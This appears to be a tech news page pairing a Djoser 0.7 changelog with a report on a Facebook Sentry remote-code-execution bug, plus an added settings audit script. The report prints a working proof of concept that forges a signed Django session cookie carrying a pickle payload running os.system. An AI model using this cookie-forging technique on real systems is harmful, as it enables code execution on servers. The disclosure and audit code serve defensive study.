Djoser 0.7 released

The new version of the REST implementation of the Django authentication system brings a large number of changes and new features
04 September 2017

What is Djoser?

REST implementation of the Django authentication system. The Djoser library provides a set of Django Rest Framework views to handle basic actions such as registration, login, logout, password reset and account activation. It works with a custom user model.

Instead of reusing Django code (e.g. PasswordResetForm), we reimplemented a few things to fit better into a Single Page App architecture.

What's new in Djoser 0.7?

According to the developers, this release took 2 months of work.
List of changes:

  • Add TOKEN_MODEL setting to allow third party apps to specify a custom token model
  • Add USER_EMAIL_FIELD_NAME setting as a compatibility solution in Django < 1.11
  • Add support for Django Password Validators
  • Add HTML templates for djoser emails
  • Add flake8 integration to CI
  • Add py.test integration
  • Add Python 3.7 to CI
  • Update from coveralls to codecov
  • Update README to rST with uniform badges
  • Update djoser.views.PasswordResetView to allow non-database User.is_active
  • Update docs on topics which have been added/modified since last release
  • Remove serializers manager, so the serializers in djoser are now accessed via dot notation
  • Remove support for DRF 3.4
  • Remove support for basic auth as authentication backend
  • Refactor djoser settings module for cleaner and more pythonic/djangonic solution
  • Refactor tests into multiple files and fix some minor issues
  • Refactor some parts of codebase for better readability
  • Slightly refactor/simplify parts of djoser.utils
  • Fix all style issues reported by flake8 in the codebase
  • Fix security bug in djoser.views.UserView

See GitHub for more info.

Another Facebook Vulnerability to be Found

A cybersecurity specialist from SCRT found a way to execute code remotely on a Facebook server
27 August 2018

Daniel Le Gall from SCRT reported a vulnerability he found on one of Facebook's servers. The problem was in Sentry, a log-storage web application written in Python on the Django framework. Facebook's engineers have since patched the hole.

Daniel found the problem while scanning IP address ranges belonging to the social network. One of them hosted a Sentry service under the host name sentryagreements.thefacebook.com. While reviewing the application, he noticed a stack trace that appeared without an obvious reason, and problems with the user password reset function. According to him, Django's debug mode had not been disabled, so the trace exposed the application's entire environment:

[Screenshot: Facebook Vulnerability]

Among the environment's keys, the SCRT expert spotted SESSION_SERIALIZER, set to django.contrib.sessions.serializers.PickleSerializer. Daniel explained that with a forged session containing arbitrary data in Python's binary Pickle object-serialization format, any code can be run on the system. To forge a session he needed Django's secret key, which appeared in plaintext in the list of Sentry settings under the name system.secret-key:

[Screenshot: Facebook Vulnerability]

The researcher wrote a proof-of-concept script that replaced the contents of the existing sentrysid cookie with an arbitrary object and made the page take 30 seconds longer to load:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

He sent the vulnerability details to the Facebook team and received $5000 under the Bug Bounty program. The company's specialists fixed the issue within 10 days of receiving the report.
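The chain described above rests on three settings: debug mode left on, PickleSerializer used for sessions, and a secret key that the settings themselves expose. The audit script below is an added example, not code from the article, from SCRT or from Django; it parses a Django settings module with ast and flags each of the three, and the two settings modules it checks are constructed for the example.

```python
import ast

# Serializer the leaked Sentry environment pointed at (named in the article).
PICKLE_SERIALIZER = "django.contrib.sessions.serializers.PickleSerializer"

# Constructed sample settings modules, not taken from Sentry or Facebook.
WEAK_SETTINGS = """
import os
DEBUG = True
SECRET_KEY = 'constructed-example-key-not-a-real-secret'
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
"""

HARDENED_SETTINGS = """
import os
DEBUG = False
SECRET_KEY = os.environ['DJANGO_SECRET_KEY']  # hypothetical variable name
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
"""


def _literal(node: ast.AST):
    """Return the value of a constant node, or None for anything computed at import time."""
    return node.value if isinstance(node, ast.Constant) else None


def audit_django_settings(source: str) -> list[str]:
    """Flag the three settings that, combined, turn a leaked key into code execution."""
    findings = []
    for node in ast.parse(source).body:
        if not isinstance(node, ast.Assign):
            continue
        names = {t.id for t in node.targets if isinstance(t, ast.Name)}
        value = _literal(node.value)
        if "DEBUG" in names and value is True:
            findings.append("DEBUG = True: the technical 500 page shows settings and "
                            "environment to any visitor who triggers an exception")
        if "SESSION_SERIALIZER" in names and value == PICKLE_SERIALIZER:
            findings.append("SESSION_SERIALIZER = PickleSerializer: session data is unpickled "
                            "on load, so whoever holds SECRET_KEY can sign a payload that runs code")
        if "SECRET_KEY" in names and isinstance(value, str):
            findings.append("SECRET_KEY is a string literal: any leak of the settings module "
                            "(debug page, repository, admin UI) hands out the signing key")
    return findings


if __name__ == "__main__":
    for label, src in (("weak", WEAK_SETTINGS), ("hardened", HARDENED_SETTINGS)):
        print(label, audit_django_settings(src) or ["no findings"])
```

Switching to JSONSerializer means a forged cookie can at most inject data, not objects with a __reduce__ hook; rotating SECRET_KEY after any exposure is still required, since the key also signs password reset tokens.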